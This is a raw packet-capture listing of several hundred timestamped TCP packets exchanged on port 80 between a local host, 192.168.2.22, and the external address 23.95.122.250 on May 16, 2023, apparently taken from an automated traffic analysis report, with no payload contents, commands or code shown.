May 16, 2023 12:56:34.610287905 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610321999 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610342026 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610358953 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610359907 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610377073 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610378981 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610399008 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610408068 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610419989 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610426903 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610439062 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610445976 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610460043 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610472918 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610479116 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610491991 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610497952 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610515118 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610528946 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610536098 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610554934 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610574007 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610574961 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610589027 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610593081 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610605955 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610613108 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610621929 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610634089 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610644102 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610652924 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610658884 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610672951 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610687017 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610691071 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610706091 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610711098 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610722065 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610729933 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610742092 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610749006 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610755920 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610766888 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610786915 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610805035 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610805988 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610824108 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610824108 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610838890 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610842943 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610855103 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610862017 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610869884 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610881090 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610893011 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610898972 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610914946 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610918045 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610934973 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610937119 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610949039 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610955000 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610968113 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610974073 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610981941 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610991955 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611006021 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611011982 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611020088 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611031055 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611047029 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611048937 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611063957 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611068010 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611087084 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611095905 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611107111 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611110926 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611125946 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611126900 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611144066 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611145020 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611164093 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611167908 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611183882 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611186028 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611200094 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611205101 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611215115 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611222982 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611242056 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611242056 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611257076 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611268044 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611279964 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611288071 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611294985 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611308098 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611325979 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611342907 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611345053 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611363888 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611382008 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611382008 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611407995 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611413002 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611417055 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611432076 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611450911 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611450911 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611465931 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611469984 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611481905 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611490011 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611496925 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611526966 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611854076 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611874104 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611892939 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611912966 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611931086 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611937046 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611949921 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611958027 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611968040 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611970901 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.611987114 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.611994982 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612005949 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612011909 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612025023 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612029076 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612042904 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612044096 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612056971 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612062931 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612080097 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612083912 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612102032 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612102985 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612121105 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612121105 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612138033 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612139940 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612159014 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612159014 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612178087 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612178087 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612193108 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612199068 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612217903 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612219095 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612236023 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612241030 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612255096 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612256050 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612272024 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612273932 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612289906 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612293005 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612312078 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612313032 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612327099 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612330914 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612344980 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612349987 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612368107 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612369061 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612380981 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612406969 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612426043 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612443924 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612451077 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612462044 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612468004 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612482071 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612483978 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612499952 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612500906 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612519026 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612524033 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612531900 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612538099 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612554073 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612555981 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612572908 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612575054 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612590075 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612593889 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612605095 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612612963 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612626076 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612631083 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612641096 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612648964 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612664938 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612667084 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612683058 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612685919 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612698078 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612704992 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612714052 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612721920 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612736940 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612740993 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612752914 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612759113 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612771034 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612778902 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612787962 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612797976 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612817049 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612834930 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612835884 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612853050 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612854958 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612867117 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612873077 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612884998 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612891912 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612900972 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612910032 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612924099 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612929106 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612945080 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612946987 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612962008 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612966061 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612977028 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.612983942 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.612996101 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.613002062 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.613009930 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.613020897 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.613039970 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.613059044 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.613059044 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.613073111 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.613078117 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.613090992 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.613095999 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.613109112 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.613130093 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.614478111 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615046024 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615540028 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615566969 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615586042 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615606070 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615606070 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615623951 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615624905 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615643978 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615644932 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615659952 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615663052 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615674973 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615681887 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615696907 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615700960 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615710974 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615719080 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615725040 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615736961 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615751982 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615756035 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.615767956 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.615783930 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616699934 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616723061 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616740942 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616760969 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616770983 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616780043 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616791010 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616800070 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616800070 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616815090 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616818905 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616832018 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616838932 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616857052 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616858006 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616872072 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616877079 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616887093 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616895914 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616910934 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616914988 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616925955 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616934061 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616945982 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616951942 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616961002 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616971970 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616983891 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.616991043 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.616998911 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617011070 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617022991 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617029905 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617044926 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617048979 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617068052 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617070913 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617082119 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617086887 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617104053 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617105007 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617120981 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617125034 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617137909 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617151022 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617171049 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617188931 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617191076 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617209911 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617225885 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617228985 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.617238998 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.617257118 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.625529051 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721564054 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721592903 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721615076 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721635103 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721653938 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721662045 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721662045 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721673965 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721693039 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721695900 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721726894 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721734047 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721755981 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721774101 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721780062 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721793890 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721796036 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721813917 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721813917 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721828938 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721834898 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721853018 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721858025 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721873045 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721874952 CEST	49171	80	192.168.2.22	23.95.122.250
